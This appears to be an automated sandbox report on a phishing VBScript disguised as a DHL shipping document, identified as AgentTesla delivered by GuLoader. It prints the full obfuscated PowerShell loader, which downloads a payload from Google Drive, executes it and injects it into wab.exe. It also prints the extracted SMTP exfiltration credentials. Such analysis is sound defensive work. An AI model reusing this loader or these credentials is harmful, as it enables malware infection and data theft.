agenttesla | ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641

General

Target

DHL Shipping doc.vbs
Size

8KB
MD5

e483b9251c12c243495cc209ff1fa8e1
SHA1

3b1d7bdc1563c60ea44c9dd410018879fa1e392e
SHA256

ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
SHA512

c9d89fd7ddbe2ceaff82228c26a86c399fa1b4553398ac9ce4ec0dc4be80cb79ec90e6f4f8f0f6f2c72bc9e6cd8adc7335d2d19ae6200c6342879c01a31c7139
SSDEEP

192:UmydX+3iccHl8m3OtcUm+6/TAizc7OfG4:KuIl8m+GUcASfG4

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.cash4cars.nz
Port:
587
Username:
[email protected]
Password:
logs2024!
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1044 powershell.exe
7 1044 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2744 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2448 powershell.exe
2744 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2448 set thread context of 2744 2448 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

1044 powershell.exe
2448 powershell.exe
2448 powershell.exe
2744 wab.exe
2744 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2448 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1044 powershell.exe
Token: SeDebugPrivilege 2448 powershell.exe
Token: SeDebugPrivilege 2744 wab.exe

flow	pid	process
5	1044	powershell.exe
7	1044	powershell.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org

pid	process
2744	wab.exe

pid	process
2448	powershell.exe
2744	wab.exe

description	pid	process	target process
PID 2448 set thread context of 2744	2448	powershell.exe	wab.exe

pid	process
1044	powershell.exe
2448	powershell.exe
2448	powershell.exe
2744	wab.exe
2744	wab.exe

pid	process
2448	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2744	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2480 wrote to memory of 1044	2480	WScript.exe	powershell.exe
PID 2480 wrote to memory of 1044	2480	WScript.exe	powershell.exe
PID 2480 wrote to memory of 1044	2480	WScript.exe	powershell.exe
PID 1044 wrote to memory of 2524	1044	powershell.exe	cmd.exe
PID 1044 wrote to memory of 2524	1044	powershell.exe	cmd.exe
PID 1044 wrote to memory of 2524	1044	powershell.exe	cmd.exe
PID 1044 wrote to memory of 2448	1044	powershell.exe	powershell.exe
PID 1044 wrote to memory of 2448	1044	powershell.exe	powershell.exe
PID 1044 wrote to memory of 2448	1044	powershell.exe	powershell.exe
PID 1044 wrote to memory of 2448	1044	powershell.exe	powershell.exe
PID 2448 wrote to memory of 2520	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2520	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2520	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2520	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe
PID 2448 wrote to memory of 2744	2448	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL Shipping doc.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
3⤵
PID:2524

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
4⤵
PID:2520

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Aptychus.Whi
Filesize
435KB

MD5
18a60c1da6907146eea018203acf5089

SHA1
01c5e653dba0eda7caba355feffa97726515247c

SHA256
1f5670e65d8367057d1cdc75de0ca4b194cef53aee9311997b1d995ecf242b04

SHA512
0eeca59fac3845807f2dd8d921f15808187f37fb945b51b568120036a46eaea7a076eeab0785e95d05b6e972d80e326a7baff5e87e68bba4621197d4e8670644

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U8AZRR6WHPZ19Z03WCQC.temp
Filesize
7KB

MD5
5b6812abc304216253a908a773b2650b

SHA1
ef226f6a56cfcfb5bea1f909da55fffc513bfa2a

SHA256
0a6a79abe2a2fc19e61cd7c51a51bdcec18a78cad2c2ea332762a066522bac85

SHA512
7841e2aca7204c2ca103497d79465e64db180c2117335a077f700fd848bf436b52c03e88bc250e30c734a47c693a04596eb448db48a04285a09c3d701ffc3942

Download Submit
memory/1044-10-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/1044-7-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/1044-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1044-9-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/1044-21-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1044-5-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/1044-65-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1044-4-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/1044-26-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/1044-23-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/1044-6-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1044-22-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/2448-27-0x0000000006760000-0x0000000009015000-memory.dmp

Filesize
40.7MB

Download
memory/2448-35-0x0000000006760000-0x0000000009015000-memory.dmp

Filesize
40.7MB

Download
memory/2448-18-0x0000000002C60000-0x0000000002CA0000-memory.dmp

Filesize
256KB

Download
memory/2448-25-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download
memory/2448-24-0x0000000006760000-0x0000000009015000-memory.dmp

Filesize
40.7MB

Download
memory/2448-17-0x0000000073310000-0x00000000738BB000-memory.dmp

Filesize
5.7MB

Download
memory/2448-16-0x0000000002C60000-0x0000000002CA0000-memory.dmp

Filesize
256KB

Download
memory/2448-28-0x0000000073310000-0x00000000738BB000-memory.dmp

Filesize
5.7MB

Download
memory/2448-29-0x00000000772D0000-0x0000000077479000-memory.dmp

Filesize
1.7MB

Download
memory/2448-30-0x0000000002C60000-0x0000000002CA0000-memory.dmp

Filesize
256KB

Download
memory/2448-31-0x00000000774C0000-0x0000000077596000-memory.dmp

Filesize
856KB

Download
memory/2448-15-0x0000000073310000-0x00000000738BB000-memory.dmp

Filesize
5.7MB

Download
